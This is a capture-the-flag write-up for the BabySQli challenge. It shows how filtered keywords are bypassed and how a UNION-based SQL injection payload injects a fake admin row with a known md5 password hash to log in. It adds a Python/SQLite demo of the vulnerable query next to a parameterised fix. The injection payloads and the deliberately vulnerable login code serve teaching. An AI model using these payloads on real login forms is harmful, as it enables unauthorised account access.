
[BUU GXYCTF2019] BabySQli

October 6, 2020 • Read: 117 • CTF

Challenge analysis

The challenge is a login form that takes a username and password; the challenge description indicates it involves SQL injection.
I tried an arbitrary username and password, 123 / 123, and got the message wrong user!
Then admin / 123, which returned wrong pass!
Testing for the injection point showed a single-quote context; admin' or 1=1# returned do not hack me!
So or is probably filtered. Trying case variation, admin' Or 1=1#, was still filtered, and further testing showed the equals sign is filtered too.
admin' Or 2>1# returned wrong pass! This puzzled me: the always-true condition clearly got through, so why was the password still rejected? Does the password actually have to match?

Solution


search.php contains a base32-encoded comment, which decodes to
select * from user where username = '$name'
This is presumably the hint, though it seemed like an always-true condition should be enough to bypass it. Since a password is required, the idea is to construct one ourselves.
Testing in my own environment:

select * from user;

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

select * from user union select 1,2,3;

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
|  1 | 2        | 3                                |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)

So a union can add a virtual row to the actual query result (the table itself holds no such record). Could that be used to construct an admin account whose password we control?

select * from user union select 1,'admin','admin';

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
|  1 | admin    | admin                            |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)

My guess was right, so let's build a payload we control and try it:
name=' union select 1,"admin","admin" %23&pw=admin,还是显示wrong pass!
Then try again with the password hashed with md5:
name=' union select 1,"admin","21232f297a57a5a743894a0e4a801fc3" %23&pw=admin
This returns the flag.
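Why the password check is satisfied, and what actually closes the hole, is easier to see in a small model of the login. The following is an added example written for this write-up, not the challenge's source code: it reconstructs the login logic that the base32 hint and the observed messages imply (look the user up by name, compare the stored password column with md5 of the submitted password), with a constructed in-memory SQLite table standing in for the challenge's MySQL table. The admin row's real password hash is a hypothetical value, since the challenge never reveals it. The write-up's final payload is adapted to SQLite only in its comment syntax (-- instead of MySQL's #) and in using single-quoted strings; the hardened version binds the username as a query parameter instead of concatenating it.

```python
import hashlib
import sqlite3

# md5("admin"): the value the write-up's final payload injects as the password column.
ADMIN_MD5 = hashlib.md5(b"admin").hexdigest()  # 21232f297a57a5a743894a0e4a801fc3

# The write-up's payload, adapted to SQLite: '--' replaces MySQL's '#' line comment
# and single quotes replace the double-quoted strings. Nothing else changes.
PAYLOAD_NAME = f"' union select 1,'admin','{ADMIN_MD5}' -- "


def make_db():
    """Constructed in-memory table shaped like the write-up's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [
            # Hypothetical real admin password hash; the challenge's value is unknown.
            (1, "admin", hashlib.md5(b"hypothetical-real-password").hexdigest()),
            (2, "hehe", "202cb962ac59075b964b07152d234b70"),  # md5("123"), as in the write-up
        ],
    )
    return conn


def login_vulnerable(conn, name, pw):
    """Login built the way the base32 hint suggests: username concatenated into the SQL.

    The password comparison itself is fine. The flaw is that the row it compares
    against can be supplied by the attacker, because the input is parsed as SQL and a
    UNION appends a row the table never contained. Blacklisting 'or' and '=' does not
    help, since the payload uses neither.
    """
    sql = f"select * from user where username = '{name}'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "wrong user!"
    if row[2] != hashlib.md5(pw.encode()).hexdigest():
        return "wrong pass!"
    return "flag"


def login_fixed(conn, name, pw):
    """Same logic with a parameterised query.

    The username is bound as a literal value, so it can never extend the statement:
    the whole payload is simply looked up as a (non-existent) username.
    """
    row = conn.execute("select * from user where username = ?", (name,)).fetchone()
    if row is None:
        return "wrong user!"
    if row[2] != hashlib.md5(pw.encode()).hexdigest():
        return "wrong pass!"
    return "flag"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD_NAME, "admin"))  # flag
    print("fixed:     ", login_fixed(db, PAYLOAD_NAME, "admin"))       # wrong user!
```

The point the model makes is that the check "stored hash equals md5(submitted password)" is only as trustworthy as the row it runs on; once the query string is attacker-controlled, the stored hash is too. Keyword filtering (here on or and =) leaves that root cause in place, whereas binding the parameter removes it regardless of which keywords the filter happens to cover.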